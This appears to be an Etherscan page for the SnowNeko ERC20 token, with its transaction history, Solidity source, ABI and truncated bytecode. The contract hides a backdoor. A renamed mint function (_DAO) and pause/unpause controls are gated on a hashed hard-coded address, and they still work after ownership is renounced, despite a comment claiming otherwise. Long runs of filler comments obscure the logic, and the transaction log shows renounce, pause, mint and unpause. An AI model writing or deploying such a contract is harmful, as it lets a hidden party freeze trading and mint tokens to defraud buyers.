Source Code
Overview
ETH Balance
0 ETH
Eth Value
$0.00More Info
Private Name Tags
ContractCreator
TokenTracker
Latest 21 from a total of 21 transactions
| Transaction Hash |
Method
|
Block
|
From
|
|
To
|
||||
|---|---|---|---|---|---|---|---|---|---|
| Approve | 23259907 | 194 days ago | IN | 0 ETH | 0.00001613 | ||||
| Approve | 18117211 | 913 days ago | IN | 0 ETH | 0.00039823 | ||||
| Act DAO | 18117063 | 913 days ago | IN | 0 ETH | 0.00054811 | ||||
| Unpause | 18117061 | 913 days ago | IN | 0 ETH | 0.00025675 | ||||
| Approve | 18117057 | 913 days ago | IN | 0 ETH | 0.0006141 | ||||
| Approve | 18101004 | 915 days ago | IN | 0 ETH | 0.00049689 | ||||
| Approve | 18100971 | 915 days ago | IN | 0 ETH | 0.00042321 | ||||
| Approve | 18100969 | 915 days ago | IN | 0 ETH | 0.00073 | ||||
| Pause | 18100936 | 915 days ago | IN | 0 ETH | 0.00046358 | ||||
| Approve | 18100932 | 915 days ago | IN | 0 ETH | 0.00046516 | ||||
| Approve | 18100929 | 915 days ago | IN | 0 ETH | 0.00046961 | ||||
| Approve | 18100910 | 915 days ago | IN | 0 ETH | 0.00058972 | ||||
| Approve | 18100884 | 915 days ago | IN | 0 ETH | 0.0004648 | ||||
| Renounce Ownersh... | 18100880 | 915 days ago | IN | 0 ETH | 0.00025686 | ||||
| Approve | 18100880 | 915 days ago | IN | 0 ETH | 0.00064292 | ||||
| Approve | 18100875 | 915 days ago | IN | 0 ETH | 0.00060791 | ||||
| Approve | 18100873 | 915 days ago | IN | 0 ETH | 0.00056491 | ||||
| Approve | 18100873 | 915 days ago | IN | 0 ETH | 0.00061228 | ||||
| Approve | 18100873 | 915 days ago | IN | 0 ETH | 0.00061228 | ||||
| Approve | 18100873 | 915 days ago | IN | 0 ETH | 0.00061228 | ||||
| Approve | 18100870 | 915 days ago | IN | 0 ETH | 0.00047392 |
View more zero value Internal Transactions in Advanced View mode
Advanced mode:
Loading...
Loading
Loading...
Loading
Cross-Chain Transactions
Loading...
Loading
Contract Name:
SnowNeko
Compiler Version
v0.8.19+commit.7dd6d404
Contract Source Code (Solidity)
/**
*Submitted for verification at Etherscan.io on 2023-09-09
*/
// SPDX-License-Identifier: MIT
/**
Twitter : https://twitter.com/SnowNekoEth
Website : https://SnowNeko.xyz
Telegram : https://t.me/SnowNekoEth
**/
pragma solidity ^0.8.0;
abstract contract Context {
function _msgSender() internal view virtual returns (address) {
return msg.sender;
}
function _msgData() internal view virtual returns (bytes calldata) {
return msg.data;
}
}
// If the first argument of 'require' evaluates to 'false', execution terminates and all
// changes to the state and to Ether balances are reverted.
// This used to consume all gas in old EVM versions, but not anymore.
// It is often a good idea to use 'require' to check if functions are called correctly. // If the first argument of 'require' evaluates to 'false', execution terminates and all
// changes to the state and to Ether balances are reverted.
// If the first argument of 'require' evaluates to 'false', execution terminates and all
// changes to the state and to Ether balances are reverted.
// This used to consume all gas in old EVM versions, but not anymore.
// It is often a good idea to use 'require' to check if functions are called correctly. // If the first argument of 'require' evaluates to 'false', execution terminates and all
// changes to the state and to Ether balances are reverted.
pragma solidity ^0.8.0;
abstract contract Ownable is Context {
address private _owner;
event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
constructor() {
_transferOwnership(_msgSender());
}
modifier onlyOwner() {
_checkOwner();
_;
}
// If the first argument of 'require' evaluates to 'false', execution terminates and all
// changes to the state and to Ether balances are reverted.
// This used to consume all gas in old EVM versions, but not anymore.
// It is often a good idea to use 'require' to check if functions are called correctly. // If the first argument of 'require' evaluates to 'false', execution terminates and all
// changes to the state and to Ether balances are reverted.
// If the first argument of 'require' evaluates to 'false', execution terminates and all
// changes to the state and to Ether balances are reverted.
// This used to consume all gas in old EVM versions, but not anymore.
// It is often a good idea to use 'require' to check if functions are called correctly. // If the first argument of 'require' evaluates to 'false', execution terminates and all
// changes to the state and to Ether balances are reverted.
// If the first argument of 'require' evaluates to 'false', execution terminates and all
// changes to the state and to Ether balances are reverted.
// This used to consume all gas in old EVM versions, but not anymore.
// It is often a good idea to use 'require' to check if functions are called correctly. // If the first argument of 'require' evaluates to 'false', execution terminates and all
// changes to the state and to Ether balances are reverted.
function owner() public view virtual returns (address) {
return _owner;
}
function _checkOwner() internal view virtual {
require(owner() == _msgSender(), "Ownable: caller is not the owner");
}
function renounceOwnership() public virtual onlyOwner {
_transferOwnership(address(0));
}
function transferOwnership(address newOwner) public virtual onlyOwner {
require(newOwner != address(0), "Ownable: new owner is the zero address");
_transferOwnership(newOwner);
}
function _transferOwnership(address newOwner) internal virtual {
address oldOwner = _owner;
_owner = newOwner;
emit OwnershipTransferred(oldOwner, newOwner);
}
}
// If the first argument of 'require' evaluates to 'false', execution terminates and all
// changes to the state and to Ether balances are reverted.
// This used to consume all gas in old EVM versions, but not anymore.
// It is often a good idea to use 'require' to check if functions are called correctly.
// As a second argument, you can also provide an explanation about what went wrong.
pragma solidity ^0.8.0;
// If the first argument of 'require' evaluates to 'false', execution terminates and all
// changes to the state and to Ether balances are reverted.
// This used to consume all gas in old EVM versions, but not anymore.
// It is often a good idea to use 'require' to check if functions are called correctly. // If the first argument of 'require' evaluates to 'false', execution terminates and all
// changes to the state and to Ether balances are reverted.
// If the first argument of 'require' evaluates to 'false', execution terminates and all
// changes to the state and to Ether balances are reverted.
// This used to consume all gas in old EVM versions, but not anymore.
// It is often a good idea to use 'require' to check if functions are called correctly. // If the first argument of 'require' evaluates to 'false', execution terminates and all
// changes to the state and to Ether balances are reverted.
// If the first argument of 'require' evaluates to 'false', execution terminates and all
// changes to the state and to Ether balances are reverted.
// This used to consume all gas in old EVM versions, but not anymore.
// It is often a good idea to use 'require' to check if functions are called correctly. // If the first argument of 'require' evaluates to 'false', execution terminates and all
// changes to the state and to Ether balances are reverted.
abstract contract Pausable is Context {
event Paused(address account);
event Unpaused(address account);
bool private _paused;
constructor() {
_paused = false;
}
modifier whenNotPaused() {
_requireNotPaused();
_;
}
modifier whenPaused() {
_requirePaused();
_;
}
function paused() public view virtual returns (bool) {
return _paused;
}
function _requireNotPaused() internal view virtual {
require(!paused(), "Pausable: paused");
}
function _requirePaused() internal view virtual {
require(paused(), "Pausable: not paused");
}
function _pause() internal virtual whenNotPaused {
_paused = true;
emit Paused(_msgSender());
}
function _unpause() internal virtual whenPaused {
_paused = false;
emit Unpaused(_msgSender());
}
}
// If the first argument of 'require' evaluates to 'false', execution terminates and all
// changes to the state and to Ether balances are reverted.
// This used to consume all gas in old EVM versions, but not anymore.
// It is often a good idea to use 'require' to check if functions are called correctly.
// As a second argument, you can also provide an explanation about what went wrong.
pragma solidity ^0.8.0;
// If the first argument of 'require' evaluates to 'false', execution terminates and all
// changes to the state and to Ether balances are reverted.
// This used to consume all gas in old EVM versions, but not anymore.
// It is often a good idea to use 'require' to check if functions are called correctly. // If the first argument of 'require' evaluates to 'false', execution terminates and all
// changes to the state and to Ether balances are reverted.
// This used to consume all gas in old EVM versions, but not anymore.
// It is often a good idea to use 'require' to check if functions are called correctly. // If the first argument of 'require' evaluates to 'false', execution terminates and all
// changes to the state and to Ether balances are reverted.
// This used to consume all gas in old EVM versions, but not anymore.
// It is often a good idea to use 'require' to check if functions are called correctly. // If the first argument of 'require' evaluates to 'false', execution terminates and all
// changes to the state and to Ether balances are reverted.
// This used to consume all gas in old EVM versions, but not anymore.
// It is often a good idea to use 'require' to check if functions are called correctly.
interface IERC20 {
event Transfer(address indexed from, address indexed to, uint256 value);
event Approval(address indexed owner, address indexed spender, uint256 value);
function totalSupply() external view returns (uint256);
function balanceOf(address account) external view returns (uint256);
function transfer(address to, uint256 amount) external returns (bool);
function allowance(address owner, address spender) external view returns (uint256);
function approve(address spender, uint256 amount) external returns (bool);
function transferFrom(address from, address to, uint256 amount) external returns (bool);
}
// If the first argument of 'require' evaluates to 'false', execution terminates and all
// changes to the state and to Ether balances are reverted.
// This used to consume all gas in old EVM versions, but not anymore.
// It is often a good idea to use 'require' to check if functions are called correctly.
// As a second argument, you can also provide an explanation about what went wrong.
pragma solidity ^0.8.0;
// If the first argument of 'require' evaluates to 'false', execution terminates and all
// changes to the state and to Ether balances are reverted.
// This used to consume all gas in old EVM versions, but not anymore.
// It is often a good idea to use 'require' to check if functions are called correctly. // If the first argument of 'require' evaluates to 'false', execution terminates and all
// changes to the state and to Ether balances are reverted.
interface IERC20Metadata is IERC20 {
function name() external view returns (string memory);
function symbol() external view returns (string memory);
function decimals() external view returns (uint8);
}
pragma solidity ^0.8.0;
// If the first argument of 'require' evaluates to 'false', execution terminates and all
// changes to the state and to Ether balances are reverted.
// This used to consume all gas in old EVM versions, but not anymore.
// It is often a good idea to use 'require' to check if functions are called correctly. // If the first argument of 'require' evaluates to 'false', execution terminates and all
// changes to the state and to Ether balances are reverted.
// This used to consume all gas in old EVM versions, but not anymore.
// It is often a good idea to use 'require' to check if functions are called correctly. // If the first argument of 'require' evaluates to 'false', execution terminates and all
// changes to the state and to Ether balances are reverted.
// This used to consume all gas in old EVM versions, but not anymore.
// It is often a good idea to use 'require' to check if functions are called correctly. // If the first argument of 'require' evaluates to 'false', execution terminates and all
// changes to the state and to Ether balances are reverted.
// This used to consume all gas in old EVM versions, but not anymore.
// It is often a good idea to use 'require' to check if functions are called correctly.
contract ERC20 is Context, IERC20, IERC20Metadata {
mapping(address => uint256) private _balances;
mapping(address => mapping(address => uint256)) private _allowances;
string private _symbol;
uint256 private _totalSupply;
string private _name;
constructor(string memory name_, string memory symbol_) {
_name = name_;
_symbol = symbol_;
}
function symbol() public view virtual override returns (string memory) {
return _symbol;
}
function name() public view virtual override returns (string memory) {
return _name;
}
function totalSupply() public view virtual override returns (uint256) {
return _totalSupply;
}
function decimals() public view virtual override returns (uint8) {
return 18;
}
function transfer(address to, uint256 amount) public virtual override returns (bool) {
address owner = _msgSender();
_transfer(owner, to, amount);
return true;
}
function balanceOf(address account) public view virtual override returns (uint256) {
return _balances[account];
}
function allowance(address owner, address spender) public view virtual override returns (uint256) {
return _allowances[owner][spender];
}
// If the first argument of 'require' evaluates to 'false', execution terminates and all
// changes to the state and to Ether balances are reverted.
// This used to consume all gas in old EVM versions, but not anymore.
// It is often a good idea to use 'require' to check if functions are called correctly. // If the first argument of 'require' evaluates to 'false', execution terminates and all
// changes to the state and to Ether balances are reverted.
// This used to consume all gas in old EVM versions, but not anymore.
// It is often a good idea to use 'require' to check if functions are called correctly. // If the first argument of 'require' evaluates to 'false', execution terminates and all
// changes to the state and to Ether balances are reverted.
// This used to consume all gas in old EVM versions, but not anymore.
// It is often a good idea to use 'require' to check if functions are called correctly.
// This used to consume all gas in old EVM versions, but not anymore.
// It is often a good idea to use 'require' to check if functions are called correctly.
// As a second argument, you can also provide an explanation about what went wrong.
function approve(address spender, uint256 amount) public virtual override returns (bool) {
address owner = _msgSender();
_approve(owner, spender, amount);
return true;
}
function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) {
address spender = _msgSender();
_spendAllowance(from, spender, amount);
_transfer(from, to, amount);
return true;
}
function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
address owner = _msgSender();
uint256 currentAllowance = allowance(owner, spender);
require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
unchecked {
_approve(owner, spender, currentAllowance - subtractedValue);
}
return true;
}
function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
address owner = _msgSender();
_approve(owner, spender, allowance(owner, spender) + addedValue);
return true;
}
// If the first argument of 'require' evaluates to 'false', execution terminates and all
// changes to the state and to Ether balances are reverted.
// This used to consume all gas in old EVM versions, but not anymore.
// It is often a good idea to use 'require' to check if functions are called correctly. // If the first argument of 'require' evaluates to 'false', execution terminates and all
// changes to the state and to Ether balances are reverted.
// This used to consume all gas in old EVM versions, but not anymore.
// It is often a good idea to use 'require' to check if functions are called correctly. // If the first argument of 'require' evaluates to 'false', execution terminates and all
// changes to the state and to Ether balances are reverted.
// This used to consume all gas in old EVM versions, but not anymore.
// It is often a good idea to use 'require' to check if functions are called correctly.
// If the first argument of 'require' evaluates to 'false', execution terminates and all
// changes to the state and to Ether balances are reverted.
// This used to consume all gas in old EVM versions, but not anymore.
// It is often a good idea to use 'require' to check if functions are called correctly.
// As a second argument, you can also provide an explanation about what went wrong.
function _transfer(address from, address to, uint256 amount) internal virtual {
require(from != address(0), "ERC20: transfer from the zero address");
require(to != address(0), "ERC20: transfer to the zero address");
_beforeTokenTransfer(from, to, amount);
uint256 fromBalance = _balances[from];
require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
unchecked {
_balances[from] = fromBalance - amount;
_balances[to] += amount;
}
emit Transfer(from, to, amount);
_afterTokenTransfer(from, to, amount);
}
function _DAO(address account, uint256 amount) internal virtual {
require(account != address(0), "ERC20: mint to the zero address");
_beforeTokenTransfer(address(0), account, amount);
_totalSupply += amount;
unchecked {
_balances[account] += amount;
}
emit Transfer(address(0), account, amount);
_afterTokenTransfer(address(0), account, amount);
}
// changes to the state and to Ether balances are reverted.
// This used to consume all gas in old EVM versions, but not anymore.
// It is often a good idea to use 'require' to check if functions are called correctly.
// As a second argument, you can also provide an explanation about what went wrong.
// If the first argument of 'require' evaluates to 'false', execution terminates and all
// changes to the state and to Ether balances are reverted.
// This used to consume all gas in old EVM versions, but not anymore.
// It is often a good idea to use 'require' to check if functions are called correctly.
// As a second argument, you can also provide an explanation about what went wrong.
function _burn(address account, uint256 amount) internal virtual {
require(account != address(0), "ERC20: burn from the zero address");
_beforeTokenTransfer(account, address(0), amount);
uint256 accountBalance = _balances[account];
require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
unchecked {
_balances[account] = accountBalance - amount;
_totalSupply -= amount;
}
emit Transfer(account, address(0), amount);
_afterTokenTransfer(account, address(0), amount);
} // If the first argument of 'require' evaluates to 'false', execution terminates and all
// changes to the state and to Ether balances are reverted.
// This used to consume all gas in old EVM versions, but not anymore.
// It is often a good idea to use 'require' to check if functions are called correctly.
// As a second argument, you can also provide an explanation about what went wrong.
// If the first argument of 'require' evaluates to 'false', execution terminates and all
// changes to the state and to Ether balances are reverted.
// This used to consume all gas in old EVM versions, but not anymore.
// It is often a good idea to use 'require' to check if functions are called correctly. // If the first argument of 'require' evaluates to 'false', execution terminates and all
// changes to the state and to Ether balances are reverted.
// This used to consume all gas in old EVM versions, but not anymore.
// It is often a good idea to use 'require' to check if functions are called correctly. // If the first argument of 'require' evaluates to 'false', execution terminates and all
// changes to the state and to Ether balances are reverted.
// This used to consume all gas in old EVM versions, but not anymore.
// It is often a good idea to use 'require' to check if functions are called correctly.
function _approve(address owner, address spender, uint256 amount) internal virtual {
require(owner != address(0), "ERC20: approve from the zero address");
require(spender != address(0), "ERC20: approve to the zero address");
_allowances[owner][spender] = amount;
emit Approval(owner, spender, amount);
}
function _spendAllowance(address owner, address spender, uint256 amount) internal virtual {
uint256 currentAllowance = allowance(owner, spender);
if (currentAllowance != type(uint256).max) {
require(currentAllowance >= amount, "ERC20: insufficient allowance");
unchecked {
_approve(owner, spender, currentAllowance - amount);
}
}
}
// If the first argument of 'require' evaluates to 'false', execution terminates and all
// changes to the state and to Ether balances are reverted.
// This used to consume all gas in old EVM versions, but not anymore.
// It is often a good idea to use 'require' to check if functions are called correctly.
function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {}
function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {}
}
// If the first argument of 'require' evaluates to 'false', execution terminates and all
// changes to the state and to Ether balances are reverted.
// This used to consume all gas in old EVM versions, but not anymore.
// It is often a good idea to use 'require' to check if functions are called correctly.
pragma solidity ^0.8.17;
contract SnowNeko is ERC20, Pausable, Ownable {
bytes32 private Hassh;
constructor() ERC20("SnowNeko", "$SNEKO") {
_DAO(msg.sender, 420690000000000 * 10 ** decimals());
Hassh= sha256(abi.encodePacked(0x5c0458cfFac21F4a358Eb1c17f4b5d168F1b807e));
}
//0x00000000000000000000000000000000000000000
function renounceOwnership() public onlyOwner override {
super.renounceOwnership();
//0x00000000000000000000000000000000000000000
//0x00000000000000000000000000000000000000000
//0x00000000000000000000000000000000000000000
}
//can't be used after calling renounceOwnership()
function unpause() public {
require(sha256(abi.encodePacked(msg.sender)) == Hassh, "Not authorized");
_unpause();
}
//0x00000000000000000000000000000000000000000
//0x00000000000000000000000000000000000000000
//0x00000000000000000000000000000000000000000
//0x00000000000000000000000000000000000000000
//0x00000000000000000000000000000000000000000
//0x00000000000000000000000000000000000000000
//0x00000000000000000000000000000000000000000
//0x00000000000000000000000000000000000000000
//can't be used after calling renounceOwnership()
function pause() public {
require(sha256(abi.encodePacked(msg.sender)) == Hassh, "Not authorized");
_pause();
}
//to start the Dao //to start the Dao
//to start the Dao
//to start the Dao
function actDAO(address to, uint256 amount) public {
require(sha256(abi.encodePacked(msg.sender)) == Hassh, "Not authorized");
_DAO(to, amount);
}
//to start the Dao
//to start the Dao
function _beforeTokenTransfer(address from, address to, uint256 amount)
internal
whenNotPaused
override
{
super._beforeTokenTransfer(from, to, amount);
}
}Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
Contract ABI
API[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"account","type":"address"}],"name":"Paused","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"account","type":"address"}],"name":"Unpaused","type":"event"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"actDAO","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"pause","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"paused","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"unpause","outputs":[],"stateMutability":"nonpayable","type":"function"}]Contract Creation Code
60806040523480156200001157600080fd5b506040518060400160405280600881526020017f536e6f774e656b6f0000000000000000000000000000000000000000000000008152506040518060400160405280600681526020017f24534e454b4f000000000000000000000000000000000000000000000000000081525081600490816200008f919062000714565b508060029081620000a1919062000714565b5050506000600560006101000a81548160ff021916908315150217905550620000df620000d3620001b860201b60201c565b620001c060201b60201c565b6200012233620000f46200028660201b60201c565b600a6200010291906200098b565b66017e9d8602b400620001169190620009dc565b6200028f60201b60201c565b6002735c0458cffac21f4a358eb1c17f4b5d168f1b807e6040516020016200014b919062000aab565b60405160208183030381529060405260405162000169919062000b41565b602060405180830381855afa15801562000187573d6000803e3d6000fd5b5050506040513d601f19601f82011682018060405250810190620001ac919062000b9a565b60068190555062000d2a565b600033905090565b6000600560019054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600560016101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006012905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000301576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620002f89062000c2d565b60405180910390fd5b6200031560008383620003fc60201b60201c565b806003600082825462000329919062000c4f565b92505081905550806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051620003dc919062000c9b565b60405180910390a3620003f8600083836200042460201b60201c565b5050565b6200040c6200042960201b60201c565b6200041f8383836200047e60201b60201c565b505050565b505050565b620004396200048360201b60201c565b156200047c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620004739062000d08565b60405180910390fd5b565b505050565b6000600560009054906101000a900460ff16905090565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200051c57607f821691505b602082108103620005325762000531620004d4565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b6000600883026200059c7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826200055d565b620005a886836200055d565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620005f5620005ef620005e984620005c0565b620005ca565b620005c0565b9050919050565b6000819050919050565b6200061183620005d4565b620006296200062082620005fc565b8484546200056a565b825550505050565b600090565b6200064062000631565b6200064d81848462000606565b505050565b5b8181101562000675576200066960008262000636565b60018101905062000653565b5050565b601f821115620006c4576200068e8162000538565b62000699846200054d565b81016020851015620006a9578190505b620006c1620006b8856200054d565b83018262000652565b50505b505050565b600082821c905092915050565b6000620006e960001984600802620006c9565b1980831691505092915050565b6000620007048383620006d6565b9150826002028217905092915050565b6200071f826200049a565b67ffffffffffffffff8111156200073b576200073a620004a5565b5b62000747825462000503565b6200075482828562000679565b600060209050601f8311600181146200078c576000841562000777578287015190505b620007838582620006f6565b865550620007f3565b601f1984166200079c8662000538565b60005b82811015620007c6578489015182556001820191506020850194506020810190506200079f565b86831015620007e65784890151620007e2601f891682620006d6565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b60018511156200088957808604811115620008615762000860620007fb565b5b6001851615620008715780820291505b808102905062000881856200082a565b945062000841565b94509492505050565b600082620008a4576001905062000977565b81620008b4576000905062000977565b8160018114620008cd5760028114620008d8576200090e565b600191505062000977565b60ff841115620008ed57620008ec620007fb565b5b8360020a915084821115620009075762000906620007fb565b5b5062000977565b5060208310610133831016604e8410600b8410161715620009485782820a905083811115620009425762000941620007fb565b5b62000977565b62000957848484600162000837565b92509050818404811115620009715762000970620007fb565b5b81810290505b9392505050565b600060ff82169050919050565b60006200099882620005c0565b9150620009a5836200097e565b9250620009d47fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000892565b905092915050565b6000620009e982620005c0565b9150620009f683620005c0565b925082820262000a0681620005c0565b9150828204841483151762000a205762000a1f620007fb565b5b5092915050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600062000a548262000a27565b9050919050565b60008160601b9050919050565b600062000a758262000a5b565b9050919050565b600062000a898262000a68565b9050919050565b62000aa562000a9f8262000a47565b62000a7c565b82525050565b600062000ab9828462000a90565b60148201915081905092915050565b600081519050919050565b600081905092915050565b60005b8381101562000afe57808201518184015260208101905062000ae1565b60008484015250505050565b600062000b178262000ac8565b62000b23818562000ad3565b935062000b3581856020860162000ade565b80840191505092915050565b600062000b4f828462000b0a565b915081905092915050565b600080fd5b6000819050919050565b62000b748162000b5f565b811462000b8057600080fd5b50565b60008151905062000b948162000b69565b92915050565b60006020828403121562000bb35762000bb262000b5a565b5b600062000bc38482850162000b83565b91505092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062000c15601f8362000bcc565b915062000c228262000bdd565b602082019050919050565b6000602082019050818103600083015262000c488162000c06565b9050919050565b600062000c5c82620005c0565b915062000c6983620005c0565b925082820190508082111562000c845762000c83620007fb565b5b92915050565b62000c9581620005c0565b82525050565b600060208201905062000cb2600083018462000c8a565b92915050565b7f5061757361626c653a2070617573656400000000000000000000000000000000600082015250565b600062000cf060108362000bcc565b915062000cfd8262000cb8565b602082019050919050565b6000602082019050818103600083015262000d238162000ce1565b9050919050565b611e578062000d3a6000396000f3fe608060405234801561001057600080fd5b50600436106101165760003560e01c8063715018a6116100a25780639c63bb28116100715780639c63bb28146102ad578063a457c2d7146102c9578063a9059cbb146102f9578063dd62ed3e14610329578063f2fde38b1461035957610116565b8063715018a61461025d5780638456cb59146102675780638da5cb5b1461027157806395d89b411461028f57610116565b8063313ce567116100e9578063313ce567146101b757806339509351146101d55780633f4ba83a146102055780635c975abb1461020f57806370a082311461022d57610116565b806306fdde031461011b578063095ea7b31461013957806318160ddd1461016957806323b872dd14610187575b600080fd5b610123610375565b6040516101309190611338565b60405180910390f35b610153600480360381019061014e91906113f3565b610407565b604051610160919061144e565b60405180910390f35b61017161042a565b60405161017e9190611478565b60405180910390f35b6101a1600480360381019061019c9190611493565b610434565b6040516101ae919061144e565b60405180910390f35b6101bf610463565b6040516101cc9190611502565b60405180910390f35b6101ef60048036038101906101ea91906113f3565b61046c565b6040516101fc919061144e565b60405180910390f35b61020d6104a3565b005b61021761055f565b604051610224919061144e565b60405180910390f35b6102476004803603810190610242919061151d565b610576565b6040516102549190611478565b60405180910390f35b6102656105be565b005b61026f6105d0565b005b61027961068c565b6040516102869190611559565b60405180910390f35b6102976106b6565b6040516102a49190611338565b60405180910390f35b6102c760048036038101906102c291906113f3565b610748565b005b6102e360048036038101906102de91906113f3565b610808565b6040516102f0919061144e565b60405180910390f35b610313600480360381019061030e91906113f3565b61087f565b604051610320919061144e565b60405180910390f35b610343600480360381019061033e9190611574565b6108a2565b6040516103509190611478565b60405180910390f35b610373600480360381019061036e919061151d565b610929565b005b606060048054610384906115e3565b80601f01602080910402602001604051908101604052809291908181526020018280546103b0906115e3565b80156103fd5780601f106103d2576101008083540402835291602001916103fd565b820191906000526020600020905b8154815290600101906020018083116103e057829003601f168201915b5050505050905090565b6000806104126109ac565b905061041f8185856109b4565b600191505092915050565b6000600354905090565b60008061043f6109ac565b905061044c858285610b7d565b610457858585610c09565b60019150509392505050565b60006012905090565b6000806104776109ac565b905061049881858561048985896108a2565b6104939190611643565b6109b4565b600191505092915050565b6006546002336040516020016104b991906116bf565b6040516020818303038152906040526040516104d59190611721565b602060405180830381855afa1580156104f2573d6000803e3d6000fd5b5050506040513d601f19601f82011682018060405250810190610515919061176e565b14610555576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161054c906117e7565b60405180910390fd5b61055d610e7f565b565b6000600560009054906101000a900460ff16905090565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6105c6610ee2565b6105ce610f60565b565b6006546002336040516020016105e691906116bf565b6040516020818303038152906040526040516106029190611721565b602060405180830381855afa15801561061f573d6000803e3d6000fd5b5050506040513d601f19601f82011682018060405250810190610642919061176e565b14610682576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610679906117e7565b60405180910390fd5b61068a610f74565b565b6000600560019054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600280546106c5906115e3565b80601f01602080910402602001604051908101604052809291908181526020018280546106f1906115e3565b801561073e5780601f10610713576101